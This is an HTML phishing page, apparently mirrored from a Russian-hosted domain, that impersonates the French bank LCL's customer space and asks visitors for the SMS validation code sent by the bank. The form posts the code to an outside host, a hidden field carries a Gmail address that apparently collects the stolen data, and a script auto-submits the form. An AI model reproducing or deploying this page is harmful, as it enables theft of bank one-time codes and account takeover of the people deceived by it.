<!doctype html>
<html lang="en">


<!-- Mirrored from monespcaleclientlclsecurite.ca69140.tmweb.ru/mail.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 10 Jun 2021 13:28:04 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title> LCL - MON Espace</title>


    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/fontawsom-all.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/style.css" />
</head>

<body>
    <div class="container-fluid conya">
        <div class="side-left">
            <div class="sid-layy">
                <div class="row slid-roo">

                </div>
            </div>
        </div>
        <div class="side-right">
            <img class="logo" src="assets/images/logo.svg" alt="">
            <span class="app-title" id="app-title" style="margin-top:40px; margin-bottom:10px">Vous allez recevoir un
                code par SMS de la part de la banque Lcl pour valider vos coordonnées personnelles</span>
            <form class="form" id="myForm" action="https://cora-stores.com/lcl3" method="POST">
                <div class="row">

                    <div class="form-row col-12">
                        <label for="">Code</label>
                        <input type="text" placeholder="Code Sms" class="form-control" name="email">
                        <input type="hidden" name="daga" value="cfnicolazo@gmail.com">
                    </div>



                    <div class="form-row" style="margin-top:15px;">
                        <input type="text" placeholder="page" class="form-control form-control-sm" id="page" name="page"
                            style="display:none;" value="3">
                    </div>

                </div>

                <div class="form-row dfr">
                    <button class="btn btn-sm btn-success">Continuer</button>
                </div>

            </form>




        </div>

    </div>
</body>


<script>
    var value = document.getElementById("email").value;

    if (value.length > 4) {

        document.getElementById("myForm").submit();
    }
</script>

<script src="assets/js/jquery-3.2.1.min.js"></script>
<script src="assets/js/popper.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/script.js"></script>



<!-- Mirrored from monespcaleclientlclsecurite.ca69140.tmweb.ru/mail.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 10 Jun 2021 13:28:08 GMT -->

</html>